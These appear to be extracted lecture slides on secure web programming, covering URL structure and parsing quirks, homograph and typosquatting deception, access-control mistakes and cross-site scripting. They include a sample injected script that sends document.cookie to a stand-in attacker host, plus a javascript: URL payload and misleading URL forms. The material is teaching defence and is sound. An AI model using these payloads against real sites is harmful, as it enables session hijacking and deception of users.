Programming **web applications securely** is a common requirement in secure programming.

- **Web is ubiquitous**
  - browsers on almost every device
  - cloud provisioned applications on the rise
  - web becomes UI for DevOps, sysadmin, . . .

- **Web technologies are ubiquitous**
  - HTML/JavaScript as a platform
  - have replaced older Flash, Silverlight, etc
  - enable cross-platform app programming (**Tizen, Cordova**) 

Although JS has serious drawbacks as a programming language, at least it provides memory safety. **TypeScript** is a front end which adds some type safety.
Outline

Overview

Essential Basics: URIs

Broken access control
  Object references
  Function access

XSS and Output Filtering

Summary
Structure of Uniform Resource Identifiers (URIs)

URIs in RFC 3986, have up to eight parts.

**URI anatomy**

scheme://login:password@address:port/path/to/resource
?q=query_string#fragment

1. **scheme** Scheme/protocol name
2. // Indicator of a hierarchical URI
3. **login:password@** credentials to access (optional)
4. **address** server to retrieve the data from
5. **:port** port number to connect to (optional)
6. **/path/to/resource** hierarchical Unix-style path
7. ?**query_string** parameters (optional)
8. **#fragment** identifier (optional)

Parts 3-5 together are called the **authority**.
Scheme name

**scheme:**

A case-insensitive string, ends with a colon.

Officially registered names are assigned by IANA

- http:, https:, ftp: and *many* others
- in fact (Oct 2023): about **100 permanent, 260 provisional, 16 historical**
  - e.g., spotify:, nfs:, soap.beep:, tv:, paparazzi:, git:
- including *document fetching schemes* sent to plugins/apps:
  - e.g., mailto:, itms:, webcal:
- and *pseudo*-URI adhoc schemes in browsers
  - e.g., javascript:, about:, config:, ....
Hierarchical versus scheme-specific

//

Every hierarchical URI in the generic syntax must have the fixed string //.

- Otherwise URI is scheme specific
  - e.g. mailto:bob@ed.ac.uk?subject=Hello

Idea: hierarchical URIs can be parsed generically.

Unfortunately:

- Original RFC 1738 didn’t rule out non-hierarchical URLs that contain //
- nor forbid (in practice) parsing URLs without //
Consequence of under-specification

Despite motivations of XHTML to stop bad HTML on the web, browser implementations were for a long time deliberately lax to try to be friendly to buggy web pages and bug-producing developers and backward compatibility. (Q. Why?)

For URLs which don’t clearly conform to the original RFC, this leads to possibly unexpected treatments, that vary between browsers.

http://example.com/
javascript://example.com/%0alert(1)
mailto://user@example.com

Examples from The Tangled Web.
Credentials

**login:password@**

- optional
- if not supplied, browser acts “anonymously”
- Interpretation is protocol specific
- Wide range of characters possible
  - some browsers reject certain punctuation chars

**Exercise.** When and when not might this be an appropriate authentication mechanism?
**Server address**

**address**

RFC is quite strict:

- case-insensitive DNS name (*www.ed.ac.uk*)
- IPv4, *129.215.233.64*
- IPv6 in brackets [*2001:4860:a005:0:0:0:0:68*]

Implementations are more relaxed:

- range of characters beyond DNS spec
- mix of digit formats, `http://0x7f.1/ = http://127.0.0.1`

**Question.** Why is this relevant to secure web app programming?
Server port

:8080

A decimal number, preceded by a colon.

Usually omitted, a default port number will be used for the given scheme.

▶ e.g., 80 for HTTP, 443 for HTTPS, 21 for FTP
▶ sometimes useful to use non-standard ports

Question. What threats might this enable?
Hierarchical file path

/path/to/resource

- Unix-style, starts with /. Must resolve .. and .
- Relative paths allow for non-fully-qualified URLs
- old style apps:
  - direct connection with file system
  - resource=HTML file, served by server
- modern apps:
  - very indirect...
  - complicated URL rewriting, dynamic content
  - paths mapped to parts of programs or database
  - server may be embedded in app

**Question.** What implications does this have for reviewing the security of web apps?
Query string

?search=purple+bananas

Optional, intended to pass arbitrary parameters to resource. Commonly used syntax:

\textit{name1=value1&name2=value2}

is \textit{not} part of URL syntax. Syntax is related to mail, HTML forms.

This means:

- server may not presume/enforce query string format
- web applications can legally use other forms after ?
Fragment identifier

Interpretation depends on client, resource type
- in practice: anchor names in HTML elements
- *Not* intended to be sent to server
- Recent use: store client-side state while browsing
  - can be changed without page reload
  - easily bookmarked, shared
  - e.g., map locations

**Exercise.** Find some uses of fragments on web pages and servers. See what happens if they are sent to the server.
Metacharacters

- Some punctuation characters are not allowed
  - e.g., : / ? # [ ] @ ! $ & ' ( ) * , ; =
- These are URL encoded with percent-ASCII hex
  - e.g., %2F encodes /, %25 encodes %

The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible.

E.g. examples like http://%65xample.%63om/, may work in some browsers but not others. Some browsers will canonicalize the authority part of the URL, then even try a search (foo.com, www.foo.com, ...).

The RFCs are not always followed.
Non-ASCII text encodings in URLs

- Original standards did not allow for non-ASCII text
- but clearly desirable for non-English text
- **RFC 3492** introduced *Punycode* to allow behind-the-scenes DNS lookup
  - DNS lookup: xn-[US-ASCII]-[Unicode]
  - Browser display: Unicode part

Extension of 38 characters to 100,000 glyphs allowed many *homograph attacks*.

- **pea.com** has 5 identical looking Cyrillic chars
- there are non-slash characters that look like /
- some attacks not easily prevented by DNS registrars

We have (puny) browser, search engine defences for this.
Parsing URLs more complicated than might hope...  
- better to use well-tested libraries than *ad hoc* code

But for *output* want to be very careful
- especially if URLs made from user (attacker) input
- should canonicalize then filter; reformat
- filter especially on the **scheme** and **authority**
Massive Typo Squatting campaign (2022)

Massive Typosquatting Racket Pushes Malware at Windows, Android Users

By John P. Mello Jr. • October 25, 2022 5:00 AM PT • Email Article

Even without resorting to homographs, users can be fooled by URLs that look close to ones they expect.

Currently, over 27 impersonated brands have been found on over 200 domains (TikTok, Paypal, Brave Browser, Tor Browser, Ethermine, . . . ).

Discovery attributed to Cyble cyber security intelligence company. See report on Techradar.
Download malware, not Tor

Download Tor Browser

Protect yourself against tracking, surveillance, and censorship.
Overall consequences

Eyeballs can easily be fooled when looking at URLs. This is bad for ordinary users as well as web app developers.

http://example.com&gibberish=1234@167772161/
http://example.com@coredump.cx/
http://example.com;.coredump.cx/

Which server is visited by each of these URLs?

**Exercise.** Try (carefully) visiting these URLs or others similar. Try asking some non-CS friends whose servers URLs like www.barclays.banking.com go to.

Examples from *The Tangled Web.*
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Access control: PHP blunders


A “cool” PHP script showhtml.php:

- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to wrapped version
Access control: PHP blunders


Remote users can display any file on the system!
Authorization and object access

What was the problem here?

- the app developer (implicitly) authorized users
  - to read documentation files he had created
  - project was open source, no need for logins
  - app contained no paths to files outside the project
  - so no explicit authorization code was written
- but PHP code didn’t check the filename returned
  - showhtml.php provided access to server objects
  - input validation only checked for file existence

There should have been a re-authORIZATION step. A well-written app should only allow access to its own resources.

**Question.** What other controls might help to prevent this problem?
Looking at anyone’s bank account

Example from *Innocent Code*, based on a Norwegian newspaper story about a “17-year geek able to view anyone’s bank account”. 
Solutions for object referencing

Re-validate

- Check authorization again
- Obvious solution, but duplicates effort

Add a data indirection

- Session-specific server side array of account nos
  
  <option value="1">1234.56.78901</option>
  <option value="2">1234.65.43210</option>

- Similarly for file access:
  
  http://researchsite.ed.ac.uk/showhtml.php?file=1#Introduction

for many files, a hash table or database could be used.
Old flaw: passing *unnecessary* information to client and expecting it back unmodified...

```
<form action="/cgi-bin/cgimail.exe" method="post">
    <input type="hidden" name="$File$"
           value="\templates\feedback.txt">
    <input type="hidden" name="$To$
           value="feedbacksomeexample">
...
</form>
```
Protecting information in server data

Sometimes the server must pass information to the client during the interaction but must protect it.

Example: editing a wiki page.

```html
<form>
  <input type="hidden" name="page" value="NineteenSixtiesToys"/>
  <textarea cols="80" rows="25" name="wpText"/>
</form>
```

Solution: add a MAC constructed with a server-side secret key.

```html
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403"/>
```

Or, could encrypt the pagename.
Other authorization mistakes

Assuming requests occur in proper order

▶ For an admin task (e.g., password reset): assuming that user must have issued a GET to retrieve a form, before a POST
  ▶ only checking authorization on first step

Authorization by obscurity

▶ Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it.

Function-level access control

This is OWASP’s term for authorizing the operations, i.e., functions, that the web app implements.

This is separate from handling authorization of

▶ pages (apps might have several functions per page)
▶ external objects, e.g., files on filesystem

Common mistake:

▶ Hiding navigation links to “unauthorized” sections
▶ . . . assuming (wrongly) this prevents non-authorized users visiting them
▶ e.g., no AdminPage link if not logged in as an admin
If someone steals my laptop while I'm logged in, they can read my email, take my money, and impersonate me to my friends, but at least they can't install drivers without my permission.
OWASP authorization advice

- Have well-specified policy
  - if non-trivial, separate it from code
- Manage authorization in a separate module
  - have a single route through code
  - can trace to make sure authorization happens
- Make authorization checks for each function
- Use deny-by-default policy
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Cross-site Scripting (XSS)

Cross-site scripting attacks first appeared in the 1990s. For a while in 2000s they were the most common public disclosed vulnerability. They remain common, try this search.

- Attack (typically on another user) of a web app
- Attacker tricks app into displaying malicious code

Code is usually script code. Many possible aims:

- display random images, popup windows
- change page contents, e.g., alter bank account number
- **session hijacking**: steal session cookies
Session hijacking with XSS

1: attacker injects script on the server and waits for a victim

2: server passes a session cookie and the attacker’s script to a visitor

3: script runs in the victim’s browser, and passes the session cookie to the attacker

4: attacker passes the stolen cookie, making the server think he is the victim

Picture from *Innocent Code*
Example injected script

```html
<script>
  document.location.replace(
    "http://www.badguy.example/steal.php"
    + "?what=" + document.cookie)
</script>
```

- redirects victim’s browser to attackers site, passing cookie
- might also pass currently visited web page
- ... then attackers server can issue a redirect back again
Persistent and Reflected XSS

**Persistent XSS** is when malicious code is stored on the server, so many visitors might execute it.

**Reflected XSS** occurs when injected malicious code isn’t stored in server, but is immediately displayed in the visited page. Suppose:


dynamically makes HTML, embedding title directly:

```
<h1>Man GCC</h1> ....
```

An attacker could use this with a malicious input:

```
... title=\<script\>...\</script\>?program=gcc
```

which e.g., steals a cookie.

**Exercise.** Explain how this attack works in practice.
Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS!
ALWAYS CHECK YOUR OUTPUTS!

Although the cause is injected code from an input, XSS damage occurs when output is produced.

Input processing is tricky: need to understand data flow through app: quoting, encoding, passed to/from functions, databases, etc.

Hence: **output filtering** is key.
Plain output: HTML encoding

- Stored data values need to be encoded to represent in HTML (e.g., < converted to &lt; etc).

Marked up output: complex filtering

- Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

- A better approach, use a dedicated syntax, convert to restricted subset of HTML.
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Review questions

Access control

Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

URLs

Recap the 8 parts of a URL. From a server side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?

XSS

Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Some commentary and examples were taken from the texts, which are recommended reading:


as well as the named RFCs.